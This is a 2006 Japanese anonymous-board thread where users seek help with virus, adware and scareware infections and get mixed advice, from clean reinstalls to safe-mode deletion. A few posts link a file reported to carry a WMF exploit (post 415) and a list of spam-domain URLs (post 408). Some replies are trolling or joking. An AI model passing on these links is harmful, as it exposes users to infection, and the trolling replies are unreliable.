こんだけ出てきたが駆除が出来ない。

AntiVir             : Found nothing
ArcaVir            :Found Trojan.Killfiles.U
Avast             :Found nothing
AVG Antivirus       :Found nothing
BitDefender         :Found nothing
ClamAV           :Found nothing
Dr.Web            :Found nothing
F-Prot Antivirus      :Found nothing
Fortinet           :Found nothing
Kaspersky Anti-Virus  :Found Email-Flooder.Win32.HASMailer.071
NOD32            :Found nothing
Norman Virus Control  :Found nothing
UNA             :Found nothing
VirusBuster Found    :Trojan.HSP.A
VBA32            :Found Win32.Trojan.KillFiles.u


ノートンとバスターのオンラインはやってみたが駄目でした。
駆除の仕方を教えて下さい。
OSはXP SP1
常駐は AVAST

328 :名無しさん@お腹いっぱい。:2006/03/24(金) 21:21:11
クリーンインスコ

329 :名無しさん@お腹いっぱい。:2006/03/24(金) 21:48:16
>>327
OE開いて手動削除すればいいじゃん
てかウイルスばら撒くなアホ

330 :名無しさん@お腹いっぱい。:2006/03/24(金) 22:30:25
検出するソフトを買ってください。

331 :名無しさん@お腹いっぱい。:2006/03/24(金) 23:11:54
KING SOFT

332 :295:2006/03/24(金) 23:17:29
なんとか自己解決。
音の原因はHDDlifeProの使用期限間近のアラームのようだった。

それと、あの直後ネットに繋がらなくなった。
Botに感染したのが原因らしく、同時にドライブ関係もおかしくなったが
なんとか復旧できた。

333 :名無しさん@お腹いっぱい。:2006/03/25(土) 01:28:06
>>332
 ヽ(・ω・)/   ズコー
\(.\ ノ


334 :名無しさん@お腹いっぱい。:2006/03/25(土) 10:47:06
>>333
 ヽ(・ω・)/   サンスー
\(.\ ノ

335 :hn27.opt2.point.ne.jp:2006/03/25(土) 19:49:42
ミナサーンナツカシイジョウホウ
fusianasan
ってかいたらIPアドレスが暴露されるよーん
ふしあなさん
誰が考えたのかねー
あーふしあなさん
どっかのおばかは、ヒューネザンとかいっておりました。ははっ
スペル間違ってたら失敬!

336 :300:2006/03/25(土) 21:46:08
クッキー削除したのですが、一個しか消えず、隠しファイルの中にいた3個を見つけて
削除することが出来ました。
スキャンの結果も大丈夫でした。リカバリしなくて済んで良かったです。
PCの大掃除にはなるんだけど、ネットの設定などで一仕事だし、助かりました。
ありがとうございました。


337 :名無しさん@お腹いっぱい。:2006/03/25(土) 23:05:21
【使用OS】 Windows XP
【WindowsUpdateしてるか】 最近やっていなかった
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 昨日やったが無し
【別のオンラインスキャンしたならその結果は】 オンラインスキャンはやっていない
【症状を具体的に、分かる限りすべて書く】一部 WEBページを開いたら謎の画像が表示される
【何をしたらそんなことになったのか】 心当たり無し、5日くらいまえから表示されるようになった
【これまでにとった措置】 スパイウェア、アドウェアのスキャン
【その他の質問】 とりあえず表十される画像を張っておきます
ttp://sund1.sakura.ne.jp/uploader/source/up7401.gif


338 :名無しさん@お腹いっぱい。:2006/03/26(日) 01:13:52
本当に困っています!
どなたかお助けください!

マウスを動かすとたびたびブラクラのような状態になってしまいます。
サーバーがどんどん開いたり、フリーズしたり、ツールバーが消えたり、
キーボードが反応しなくなったり・・・といろんな症状が起こります。
使用OSはWindows 2000です。
使用ワクチンソフトは「トレンドマイクロ2002年度版」を
年一回継続的に振り込む形で使用しておりました。
(最近になって2002年度版を更新するだけで最新ソフトを使えるわけじゃない事を知りました)
とりあえずトレンドマイクロやシマンテックの無料体験ソフトなどダウンロードしたのですが、
一向に治りません。
spy-botやad-awareなどスパイウェア検索駆除ソフトを最新の物にアップデートした後、
検索し、見つかったスパイウェアを駆除したのですが、それでも治りません。
そこで日本F-Secure株式会社のHPで「F-Secureアンチウィルス 30日間評価版」
をダウンロードしたのち、
当該ページの無償ウィルス検査を行ったところ、ウィルスが一件見つかりました。
それが「C:\Program Files\BCP\check2.htm Trojan.BAT.KeyboardDisable.d」です。
ウィルスを見つけたまではいいんですが、このウィルスの削除方法がわからず、
困っています。駆除ソフトのダウンロード場所など教えていただければ幸いです。
また画面上に起こる症状が多岐にわたるため、キーボード使用不能のウィルス以外の
ウィルスも感染している可能性が考えられるのでしょうか?
その可能性についてもご指導いただき、対処法をご教授いただければ幸いです。
どうぞよろしくお願い致します。 m(_ _)m

339 :名無しさん@お腹いっぱい。:2006/03/26(日) 01:30:47
>>338
相当重症みたいだし。
そこまで酷いなら大事なデータをバックアックして
OSをクリーンインストールしたほうがいいと思うよ。
クリーンインストール後に
バックアックしたデータをアンチウイルスソフトの
最新パターンファイルで検索でしょう。

340 :名無しさん@お腹いっぱい。:2006/03/26(日) 01:37:21
>>339
人による組み立て式のパソコンでして、
自分の手ではバックアップが出来ないんです。
組み立ててくれた人とも疎遠でして・・・。
なんかほかに方法ないでしょうか・・・?

もしどうしてもダメな場合は、
データをバックアックするためのソフトを購入し、
>>339さんがおっしゃられるように
アンチウイルスソフトの最新パターンファイルで検索かけてみたいと思います。

その前になんか方法があればいろいろ試してみたいです。
お金がなるべくかからない形で・・・。

341 :339:2006/03/26(日) 01:55:00
>>340
重症な感染PCを手間をかけてウイルスと格闘するよりクリーンインストールするほうが
時間も早いし確実だと思うけどね。

データのバックアックは手動でできるが?
画像、メール、文章などのファイルをローカルや外部メディアにコピーすれば済むことではないのかい?

342 :名無しさん@お腹いっぱい。:2006/03/26(日) 02:46:07
なんかいやな画像だなおい

343 :名無しさん@お腹いっぱい。:2006/03/26(日) 02:49:09
>>340
はい もうおしまい
100万でも200万でも払って業者に依頼してね
駆除すりゃ元通りになると思っているおばかさん
レジストリ内の改変された箇所は全部元通りにはならないから後遺症が炸裂

344 :名無しさん@お腹いっぱい。:2006/03/26(日) 03:43:06
>>340
新しいHDD買ってきて、それにOSやらアンチウイルスインスコ。
今までのHDDをスレイブで接続してウイルススキャン。
データ復旧。

で、いいんじゃないか?

345 :名無しさん@お腹いっぱい。:2006/03/26(日) 05:34:02
この画像なんて書いてあるんだろ?

346 :名無しさん@お腹いっぱい。:2006/03/26(日) 06:23:06
釣りだ、バーカwwwwwwww
とかだったりしてな

347 :名無しさん@お腹いっぱい。:2006/03/26(日) 10:07:15
>>338
higaitaisaku に逝ってみろ

348 :337:2006/03/26(日) 13:01:59
その後ウィルスバスターのオンラインスキャンをやってみてウィルスを一件検出したので削除し、
ウィンドウズディフェンダーで一件検出し削除したがまだ出るので次は何を試したらいいか現在考え中
せめてなんて書いてあるかがわかれば・・・

349 :名無しさん@お腹いっぱい。:2006/03/26(日) 14:29:39
>>343
100万でも200万でもってアホか!
そんなんだったら普通買い換えるだろ。
煽りにもなってねー。

350 :343:2006/03/26(日) 14:47:37
釣れたwwwwwwwwwwww

351 :名無しさん@お腹いっぱい。:2006/03/26(日) 15:36:28
【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】 VB2006
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 現在進行中
【別のオンラインスキャンしたならその結果は】 やっていません
【症状を具体的に、分かる限りすべて書く】 今のところはない
【何をしたらそんなことになったのか】 あるWEBページを開いた時に強制的にIEは閉じたがvirus is downlardedと表示された。
【これまでにとった措置】 ウィルス、スパイウェアのスキャン
実行したページ↓
ttp://www7a.biglobe.ne.jp/~dokyo/newpage29.html

352 :名無しさん@お腹いっぱい。:2006/03/26(日) 15:52:20
>>351
度胸試しの部屋というサイト
最後までやってみなよ、わかるから

こんなの真に受ける人が居たなんて・・・

353 :名無しさん@お腹いっぱい。:2006/03/26(日) 16:46:08
>>350
そんな釣りなんか楽しんでないで教えてやってよ。
俺にはやってられないし。

354 :名無しさん@お腹いっぱい。:2006/03/26(日) 17:41:46
【WindowsUpdateしてるか】 していない

こんな奴に教える必要はない

355 :名無しさん@お腹いっぱい。:2006/03/26(日) 17:56:40
>>350>>352は別人でしょ。

356 :名無しさん@お腹いっぱい。:2006/03/26(日) 22:53:22
別人だろ。
それをいうなら>>351>>353だよ。

357 :名無しさん@お腹いっぱい。:2006/03/26(日) 23:08:00
【使用OS】Windows XP SP2
【WindowsUpdateしてるか している
【AntiVirusは何を使っているか】 ノートン2005
【ちゃんとUpdateしてるか】 している
【症状を具体的に、分かる限りすべて書く】
PCを起動すると 画面の左上に「YФY」こんな
感じの文字が表示されるだけでwindowsが起動しない。

なんとか起動できるようになりませんか?
教えてほしい……

358 :名無しさん@お腹いっぱい。:2006/03/27(月) 00:02:30
感染したらいきなり大音量で女のあえぎ声が始まるウィルスがあったら怖いですね・・・。

359 :名無しさん@お腹いっぱい。:2006/03/27(月) 00:15:39
>>357
せーふもーどで起動
だめならりかばりぃ

360 :名無しさん@お腹いっぱい。:2006/03/27(月) 00:28:08
>>355
実は、どっちも僕だったりするw
ちなみに>>343ではないけど4

361 :名無しさん@お腹いっぱい。:2006/03/27(月) 10:02:04
>>358
あえぎ声ならいいかも・・・・

362 :名無しさん@お腹いっぱい。:2006/03/27(月) 10:11:17
avast!が反応するんだけどコードかなんか張ってあるのか?

363 :名無しさん@お腹いっぱい。:2006/03/27(月) 22:12:19
age

364 :名無しさん@お腹いっぱい。:2006/03/28(火) 13:00:15
ウィルスバスタ2006で検索したところ
TROJ_ANI.Lというウイルスに感染して隔離したとなりました
対処法をみると
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。
この不正プログラムは、「TROJ_ANI.L」として検出されます。
検出したファイルはすべて削除してください。

とでていますが
対策製品とはどういうものなのですか
私ぜんぜんPC詳しくなくて・・・助けてください

365 :名無しさん@お腹いっぱい。:2006/03/28(火) 13:03:29
クマー

366 :名無しさん@お腹いっぱい。:2006/03/28(火) 13:22:11
>>365
                   ∩___∩
                    | ノ      ヽ (つ )
                   /  ●   ●| |  |
              /\  |    ( _●_) ミ  /  呼んだクマッ ?
     ___   /   \彡、   |∪| ノ  /
     ___  (  ,/\       ヽノ _/
             `´   /       /
    ___        |      /
    ___         ヽ     ̄ ̄)
          ___  / \_ / /
          __  /   / (  \
        。      |  /   \_)
         (´⌒;   | /
      (´⌒;; (´⌒  ∪

367 :名無しさん@お腹いっぱい。:2006/03/29(水) 11:45:23
BAT_DELTREE.Fってウィルス実行しちゃってファイル消されまくったのですが
このウィルスの削除パターンって探しましたが何処にも書いてません。
知ってる方いますか?CドライブのA〜から消すって訳でもないし。
何消されたか分からないからコエーーーーーーーーーーーーー

368 :名無しさん@お腹いっぱい。:2006/03/29(水) 12:08:55
>>367
BAT_DELTREE.Fを検出したソフトのサイトで調べる。

ってググったら書いてあんじゃねーかよ、ヴォケ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BAT%5FDELTREE%2EF&VSect=T

369 :名無しさん@お腹いっぱい。:2006/03/29(水) 12:17:26
ドライブ全てのファイル削除を試みるってのは知ってんのよ。そこも見た。
ただドラクエのデータが消えた時のメロディ流しながら削除始まって、DOSバッチのプロセス殺すまで結構時間経ってたんだが、何消されたのかが全然分からん。

C〜Kドライブまでの全てのファイル削除って話だから、Cドライブから順番に消すと予想はできるが、Documents and Settings〜とか残ってるしリカバリのしようが分からんのよ。

370 :名無しさん@お腹いっぱい。:2006/03/29(水) 12:21:25
>>367
何消されてるかわからない時点でアウト!クリーンインスコしる!

>>364
WindowsUpdateしる!
ウイルスバスターでもノートン先生でもなんでもいい
ウイルス対策ソフトを買ってインスコ

371 :名無しさん@お腹いっぱい。:2006/03/29(水) 12:24:46
他人PCのウィルス処理をしてるんだが・・・。

avast!でひっかかった Win32:Agent-KW [trj] が組み込まれたウィルス。
ウィ○スバスター2006では、見事にスルーしてくれるんだが、大丈夫なのか?




372 :名無しさん@お腹いっぱい。:2006/03/29(水) 12:28:30
>>369
「発見日: 2004/12/08」のウィルスにやられてる時点で終わってる

373 :名無しさん@お腹いっぱい。:2006/03/29(水) 12:36:36
終わってるのは分かってるよw 2,3年振り久々にやらかした。
とりあえず削除パターン不明のままなんで、エラーが出るまで様子見するしかないな。
てか影響を受けるソフトウェア:DOS, Windows 95, 98, MEなんだが、XPだから実は助かってたり?

374 :名無しさん@お腹いっぱい。:2006/03/29(水) 13:51:33
【使用OS】
XPSP2
【WindowsUpdateしてるか】
やってます
【AntiVirusは何を使っているか】
ウイルスバスター
【ちゃんとUpdateしてるか】
自動アップデートしてる
【スキャンした結果(ウイルス名・発見場所)】
TROJ_DELF.AXE・C:WINDOWSの中のsmss.exe
【何をしたらそんなことになったのか】
さっき急にウイルス発見しましたと出ました。誤って.exeを踏んだのかもしれません
【これまでにとった措置】
ウイルスバスターのページに行って対応方法の所をみながら感染ファイルを削除しようとしましたが
smss.EXE隔離も削除も出来ません。
【別のオンラインスキャンしたならその結果は】
やってません。
【症状を具体的に、分かる限りすべて書く】
よくわかりません。。。
【その他の質問】
smss.exeがいつも削除できず残ります。解決法教えてくださいm(_ _"m)



375 :名無しさん@お腹いっぱい。:2006/03/29(水) 14:04:51
>>374
セーフモード


376 :名無しさん@お腹いっぱい。:2006/03/29(水) 14:12:09
>>375
レス有り難うございます。セーフモードでやってみます。

377 :名無しさん@お腹いっぱい。:2006/03/29(水) 14:48:09
>>373
>影響を受けるソフトウェア:DOS, Windows 95, 98, ME
>"DELTREE" コマンドを使用して、ファイルの削除を試みます。
"DELTREE" コマンドはXPにはない
以上

378 :名無しさん@お腹いっぱい。:2006/03/29(水) 15:28:58
>>377
なるほど通りで。画面効果とメロディーにだまされた・・
面白いからもう一回じっくり実行してくる ノ

379 :名無しさん@お腹いっぱい。:2006/03/29(水) 15:54:33
┐(´ー`)┌

380 :364:2006/03/29(水) 17:30:33
>>370
アリガトでつ
ウイルスバスター2006インスコしてます
隔離されてるようで
隔離されたフォルダを削除しました
これでいいのか不安です
スキャンしても検出はされない状態になったのですが・・・

381 :名無しさん@お腹いっぱい。:2006/03/29(水) 18:20:25
リカチャンしろリカチャン

382 :名無しさん@お腹いっぱい。:2006/03/29(水) 18:36:43
隔離されてんなら、わざわざフォルダごと削除しなくても良いのでは…

383 :名無しさん@お腹いっぱい。:2006/03/29(水) 18:41:52
>>381
リカちゃんしないと駄目かな?・・・

>>382
なんとなく削除した方がいいのかと思って

384 :名無しさん@お腹いっぱい。:2006/03/29(水) 19:47:45
すみません、原田ウィルスに感染してしまったのですが、
どうすれば駆除できるのでしょうか?
ウィルスバスターオンラインやっても無反応でした。
どうかよろしくお願いします


385 :名無しさん@お腹いっぱい。:2006/03/29(水) 20:15:42
とりあえずググるってことを覚えようね、坊や

386 :名無しさん@お腹いっぱい。:2006/03/29(水) 23:32:52
【使用OS】 XP
【WindowsUpdateしてるか】 それなりに
【AntiVirusは何を使っているか】 ノートンアンチウイルス
【ちゃんとUpdateしてるか】 やってます。今も最新版。
【スキャンした結果(ウイルス名・発見場所)】再起動後スキャンしたら何もでてこなかった。

【症状を具体的に、分かる限りすべて書く】 さっきリンク先に行ったら
「ウィルスに感染しました。修復できません」って出た後、ブラクラみたいに
コマンドプロンプト(だっけ?)の画面が何十個も出だしたので強制終了させた。

【何をしたらそんなことになったのか】 リンクを踏んだら
【これまでにとった措置】 回線プッツン(もう付け直したけど)、外付けHDプッツン
【その他の質問】 ウイルスは消えたのかどこかで身を潜めているのか知りたい。

まぁ稚拙な文ですみませんがレスよろしくお願いします。


387 :386:2006/03/29(水) 23:39:59
また出ました。
さっきと違う所で。
今度はブラクラはついてませんでした。
ウィルス名はBLoodhound.Exploit.6
適応した処理は『ファイルを修復できません』

どうすればいいでしょうか?

388 :名無しさん@お腹いっぱい。:2006/03/29(水) 23:43:25
普通にブラクラじゃね?ww

389 :386:2006/03/29(水) 23:46:45
なるほど。
じゃあ『ファイルを修復できません』てのは
スルーしてても大丈夫なんでしょうか?

390 :名無しさん@お腹いっぱい。:2006/03/29(水) 23:47:49
すぐ永の旅に出た方がいい

391 :386:2006/03/29(水) 23:51:44
>>390
えっと…単刀直入にお願いします。

392 :名無しさん@お腹いっぱい。:2006/03/29(水) 23:56:59
気になるならリカバリ

393 :名無しさん@お腹いっぱい。:2006/03/29(水) 23:57:47
おまいの頭と腕では無理って事

窓から(ry  とも言う

394 :386:2006/03/30(木) 00:03:27
>>392
リカバリィ?
前のパソコンも末期はウイルス感知→リカバリ→ウイルス感知→リカバリ(r
のループで大変だった記憶がある。電気屋呼んでも直らんし、ウイルスソフト代パァになるし
そのせいで家族みんなイライラ。母はヒステリー起して、家庭崩壊しかけた。
もうリカバリはトラウマ。破滅の象徴。

「気になるなら」って事は普通に使う分には問題ないって事ですよね?


395 :386:2006/03/30(木) 00:04:06
>>393
という事はある程度の腕があれば修復可能?

396 :名無しさん@お腹いっぱい。:2006/03/30(木) 00:24:54
>>394-395
>【WindowsUpdateしてるか】 それなりに

これが原因なんだよ。 SP2にしてなきゃ繋いで5秒でネットワームかかり放題だ

  いいか、この通りにやれ
事前にMSからSP2落として置いて、ネットから切り離す。
リカバリ→SP2当て→セキュソフトインスコ→ネット接続→Winとセキュのうpデート
 順番間違えたら元の木阿弥だぞ

  後はルーター入れて勉強しろ。

397 :名無しさん@お腹いっぱい。:2006/03/30(木) 00:50:38
Bloodhound.Exploit.6
ttp://www.google.com/search?num=100&hl=ja&q=Bloodhound.Exploit.6&lr=

398 :名無しさん@お腹いっぱい。:2006/03/30(木) 01:48:18
>>396
 \ 乙 /     \ カレー /
    __
   /   /.|
  /   /. |
 /__/./| |__
 |__|/ .| |__| |  _____
   (゚Д゚,,)| | //  .| ボンカレー|:|
   (/  ヽ) |//   | (゚д゚,,) .|:|
   | ∞ |  /    (/ 辛 ヽ).|:|
   \_\/     |__  _|:|
    U"U ̄       U"U

やさしいっすね(w

399 :名無しさん@お腹いっぱい。:2006/03/30(木) 02:11:08
>>78
NOD32はこういうトラブルも。

【匿名強化版】Winnyp by lark Part23【完全互換】

131 :[名無し]さん(bin+cue).rar:2006/03/05(日) 22:02:12 ID:v6yRSm9e0
OSのクリーンインストールしたら、SafeNy入れてるとエラーが出るようになってあせったけど、
新しく買ってきたNOD32が原因だったのか

195 :[名無し]さん(bin+cue).rar:2006/03/11(土) 22:58:08 ID:z+99W1uK0
えぇ〜、>>131を書き込んだものですが、
ついさっきのNOD32の更新の後、nyp自体が動作しなくなりました。
起動しても、即ハングしてしまいます
AMONの常駐保護を無効にしとけば、通信を開始するので、NOD32のうpだてが原因と思われます。



400 :名無しさん@お腹いっぱい。 :2006/03/30(木) 04:31:29
ウイルス警告、自動的にファイルを削除しました、というのが出続けて
OKを押しても止まりません。ノイローゼになりそうです。
いちいち違うファイルみたいですが、ノートンでウイルスはVBSラブレター
です。何か方法はありませんでしょうか。

401 :名無しさん@お腹いっぱい。:2006/03/30(木) 05:46:05
>>400
とりあえずテンプレのQ&Aでも読みなさい。
それでもノイローゼになりそうならネットを止めると良いでしょう。

402 :!お願いします!:2006/03/30(木) 14:57:40
【使用OS】WindowsXP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】 ウィルスバスター
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】検知なし
【別のオンラインスキャンしたならその結果は】 していない
【症状を具体的に、分かる限りすべて書く】
『ピー』という音がする。
skypeで使っているWEBカメラのソフトが起動させていないのに、
常に『エラーが発生しました』とダイアログが出る。
パソコン自体は問題なく動く。
【何をしたらそんなことになったのか】
サイトを見ていたら「ネット上でウィルスを発見しました」と出た。
その直後から上記の症状発生。
【これまでにとった措置】
ウィルスが検知されず、いろいろなサイトで調べてもそのようなウィルスは見つからず、
ウィルスなのかどうかも怪しいため特になにも施していない。
【その他の質問】
実は自分のパソコンではなく遠距離の彼女のパソコンで起こっている症状のため、自分自身もどんな状況なのかよくわからないんです。
話を聞いていると、サイトを見ていただけで感染したみたいなのですが、そんなウィルスってあるのでしょうか?
最新版のウィルスバスターでも検知できないとなると、もはや手の施しようがありません…。
ちなみに彼女の使っているパソコンはVGN-FS23Bです。
http://www.vaio.sony.co.jp/Products/FS4/spec_retail.html

アドバイスよろしくお願いいたします。

403 :名無しさん@お腹いっぱい。:2006/03/30(木) 15:58:55
>>402
脆弱性を利用すればウイルスを仕込むこともできる。
WindowsUpdateしてるようだから未パッチの脆弱性を突かれたのかもな。
ttp://www.itmedia.co.jp/news/articles/0603/27/news063.html

404 :名無しさん@お腹いっぱい。:2006/03/30(木) 18:24:04
なーんかWinFixerの広告でも踏んだような気がする
まぁ彼女がいる奴なんかウイルスでPCぶっ壊れてしまえば良いよ^^

405 :名無しさん@お腹いっぱい。:2006/03/30(木) 18:36:53
ムキーーーー!!!!
    r ⌒ヽ
    (´ ⌒`) ポッポー !
        l l
カタカタ ∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
.     (・∀・ #)<  マンドクセーーーーリカバリすれ
  _| ̄ ̄||_)_\____________
/旦|――||// /|
| ̄ ̄ ̄ ̄ ̄| ̄| . |
|_____|三|/

406 :名無しさん@お腹いっぱい。:2006/03/30(木) 18:40:05
もしかして彼女にこのスレ見るように言ってるんじゃ・・・
卑猥な事を書きたい気分

407 :名無しさん@お腹いっぱい。:2006/03/30(木) 18:46:56
        彼女の○○○も♪


















        ∬ 
      |.~~~~.|
      |    |
      |    |
      |    |
      |    |
      |    |     吸いたぃょぅ
      | .゚ω゚| y━~     吸いたぃょぅ
      |__|
      |.エコー|
      |//|
      |//|
        ̄ ̄

408 :名無しさん@お腹いっぱい。:2006/03/30(木) 20:55:36
このウイルスってどんなウイルスですか?間違えて、対策なしで開いちゃったんだけど・・・
よろしくお願いします


http://downloadfreeanimationsoftware.primofuoco.co.uk/article84442.html
http://shenandoahwildflower.vikingstud.co.uk/article81597.html
http://cheapairfaretoitaly.natejoseph.co.uk
http://highjuniorscholarshipschool.newtownmts.co.uk/review36193.html
http://freeincometaxcalculator.vip-guest.co.uk
http://condokauairentalvacation.natejoseph.co.uk
http://verizonpdaphone.primofuoco.co.uk/review46372.html
http://conferencecalletiquette.primofuoco.co.uk/article67817.html
http://michiganhighschoolfootballresult.newtownmts.co.uk/review64820.html
http://cellulardownloadphonewallpaper.primofuoco.co.uk/article61380.html





409 :名無しさん@お腹いっぱい。:2006/03/30(木) 21:13:19
何これ

410 :名無しさん@お腹いっぱい。:2006/03/30(木) 22:34:59
>>408
細かいことは気にしない

411 :名無しさん@お腹いっぱい。:2006/03/31(金) 06:07:35
>>410

408です。ありがとうございました。
ちなみにウイルス対策ソフトはなにを使っていらっしゃいますか?
何回も質問すみません。

412 :名無しさん@お腹いっぱい。:2006/03/31(金) 06:30:58
>>408
ウイルス等は無し
PC無害

413 :名無しさん@お腹いっぱい。:2006/03/31(金) 10:58:12
【使用OS】 WindowsXP SP2
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 2003
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 検出されませんでした
【症状を具体的に、分かる限りすべて書く】 大量メール送信
【何をしたらそんなことになったのか】 分かりません
【これまでにとった措置】
ノートンの定義ファイルを更新してスキャンしましたが検出されませんでした
メールの件名を調べてググった結果"Spam-Skull.dll"というウイルスっぽいです
シマンテックで"Spam-Skull.dll"を検索しても引っかかりませんでした

ノートンでこのウイルスに対処する方法は無いのでしょうか?お願いします

414 :名無しさん@お腹いっぱい。:2006/03/31(金) 11:31:15
2003じゃ駄目なんじゃ・・・

新しいのを買えよ貧乏人!!

415 :名無しさん@お腹いっぱい。:2006/03/31(金) 15:02:15
http://homepage2.nifty.com/satp/imgboard/img-box/img20060331021800.jpg
踏んじゃいました
やばいでしょうか?

416 :名無しさん@お腹いっぱい。:2006/03/31(金) 15:13:23
>>415
JS:ClassLoader-7とMS06-001 WMF Exploitを検出
PC有害

Windowsをアップデートしてれば問題なし


417 :名無しさん@お腹いっぱい。:2006/03/31(金) 15:21:16
>>412

ありがとうございました。

418 :名無しさん@お腹いっぱい。:2006/03/31(金) 15:24:18
>>416
アップデートしてますが、どんなウイルスなのか少し心配です・・

ありがとうございました。

419 :小野寺 達:2006/03/31(金) 15:30:01
【使用OS】Windows Xp SP2
【WindowsUpdateしてるか】 しています。
【AntiVirusは何を使っているか】 Norton AntiVirus2006
【ちゃんとUpdateしてるか】 しています。
【スキャンした結果(ウイルス名・発見場所)】 検知なし(脅威なし)
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 PCを起動するたびに「Win Fixer」が作動し、タスクバーに表示が出る。
【何をしたらそんなことになったのか】 普通にネットをしていたら。
【これまでにとった措置】 スキャンした。それとシマンテックのホームページを開いた。
【その他の質問】

420 :名無しさん@お腹いっぱい。:2006/03/31(金) 15:35:21
>>419
http://www.higaitaisaku.com/removewinfixer.html

421 :名無しさん@お腹いっぱい。:2006/03/31(金) 15:38:38
【使用OS】XP SP2
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】ウイルスバスター2006
【ちゃんとUpdateしてるか】しています
【スキャンした結果(ウイルス名・発見場所)】ウイルス名 ADW NDOTNET1.O 発見場所 C\PROGRAM FILES\NEWDOTNET\NEWDOTNET7_22.DLL
【別のオンラインスキャンしたならその結果は】していません
【症状を具体的に、分かる限りすべて書く】ネットに繋げません。無線ランの情報を見たら接続となってるのですが、メッセとスカイプは未接続で、インターネットブラウザを起動してもページを表示できないと出ます。
【何をしたらそんなことになったのか】今朝パソコンを点けたらなってました
【これまでにとった措置】ウイルスバスターがNEWDOTNET7_22.DLLへのアクセスを拒否してくれたそうです
【その他の質問】




NEWDOTNET7_22.DLLを消そうとしたのですが、ディスクがいっぱいでないか、書き込み禁止になっていないか、またはファイルが使用中でないか確認してくださいと出て削除できませんでした。


携帯からの書き込みなので読みづらいと思います。ごめんなさい…

422 :名無しさん@お腹いっぱい。:2006/03/31(金) 16:15:43
セーフモードで消してみれば?

423 :名無しさん@お腹いっぱい。:2006/03/31(金) 16:18:33
ここら辺がクサイな
ttp://www.geocities.co.jp/SiliconValley-Cupertino/5165/n-CASE.html
ttp://hjdb.higaitaisaku.com/database.cgi?cmd=dp&num=189

424 :421:2006/03/31(金) 16:49:02
>>422
すみません、セーフモードで消すとはどうやるのでしょうか。

>>423
上のurlに記載されていた簡単な方法を試してみましたがファイルが見付からないと言われできませんでした。

425 :名無しさん@お腹いっぱい。:2006/03/31(金) 16:56:24
手っ取り早くリカバリしたら。

426 :名無しさん@お腹いっぱい。:2006/03/31(金) 21:01:54
>>424
起動時にF8連打
あとは日本語読めば分かる

427 :名無しさん@お腹いっぱい。:2006/03/31(金) 23:56:18
ぐぐったらこれがでてきたけど

Mcafee

NewDotNet applicationは、ウイルスやトロイの木馬ではありません。
New.Net社が提供する新トップレベルドメインをサポートする同社のアプリケーションです。
NewDotNet applicationは他の製品にバンドルされたり、ユーザが手動でインストールします。

・このアプリケーションは、コントロールパネルの「アプリケーションの追加と削除」で削除できます。
詳細については、New.Net社のWebサイトを参照してください。

ttp://www.mcafee.com/japan/security/virN2003.asp?v=NewDotNet%20application




428 :名無しさん@お腹いっぱい。:2006/03/32(土) 00:12:20
>>421
http://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.ndotnet.html

429 :名無しさん@お腹いっぱい。:2006/03/32(土) 01:06:31
これはヤバイw

WindousXP/Windous Server 2003に新たな脆弱性が発見される
ttp://internet.watch.impress.co.jp/static/uocchi/2004/04/01/ms.htm


430 :名無しさん@お腹いっぱい。:2006/03/32(土) 03:09:32

  なんだかあちこちのサイトでやってるみたいね。

431 :名無しさん@お腹いっぱい。:2006/03/32(土) 03:15:15

NOD32だけ、昨日の時点ではOptix系ウイルスの新種に対応できていないみたい。
フリーの製品の方が早く対応できてるし・・・・・・。

★NOD32アンチウィルス Part31

549 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2006/03/31(金) 11:14:37
http://vista.x0.to/img/vi4377115328.jpg

NOD32だけ未対応(´・ω・) カワイソス


432 :名無しさん@お腹いっぱい。:2006/03/32(土) 13:51:16
投稿日:2006/03/32(土)って・・・w

433 :名無しさん@お腹いっぱい。:2006/03/32(土) 15:10:25
日付表示がおかしくなるウィルスらしいよ

434 :名無しさん@お腹いっぱい。:2006/03/32(土) 18:04:46
楽しいなぁww
日本最大の掲示板でのハプニング

435 :名無しさん@お腹いっぱい。:2006/03/32(土) 18:11:55
エイプリルフールだから?

436 :名無しさん@お腹いっぱい。:2006/03/32(土) 18:47:06
watta_3@ybb.ne.jp

437 :名無しさん@お腹いっぱい。:2006/03/32(土) 23:49:23
ネタらしいね


438 :名無し初心者:2006/04/02(日) 02:16:47
どなたかご回答お願いします!!
さっき音楽を落とすサイトにいっていたら、
突然画面が真っ暗になってしまいました。
ダウンロードした曲はそのまま流れていました。
PCの電源を切ってもう一度立ち上げたのですが、
Windows(XP)は起動する音は聞こえるのですが、
画面は真っ暗なままです。
ウイルス対策としてはノートンの最新版をいれていて、
フリーのスパム対策ソフトも入れていました。
(名前が思い出せないのですが・・・)
なにかウイルスにかかってしまったのでしょうか??


439 :名無しさん@お腹いっぱい。:2006/04/02(日) 02:25:07
ご愁傷様

440 :438です:2006/04/02(日) 02:25:37
【使用OS】 Windows XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 していません
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】
   モニターが映らなくなりました。
【何をしたらそんなことになったのか】  
   音楽を落とすサイトでいつものようにダウンロードして
   聴いていたら突然なってしまいました。
【これまでにとった措置】
   モニターの画質やメニューなどのボタンを押してみたが
   変わらないので、本体のボタンを押してPCの電源を
   切りました。その後立ち上げ、電源を切る、を2回試みましたが
   何も変わりません。



441 :名無しさん@お腹いっぱい。:2006/04/02(日) 03:07:18
>>440
マルチすんな、あっちで答えてる

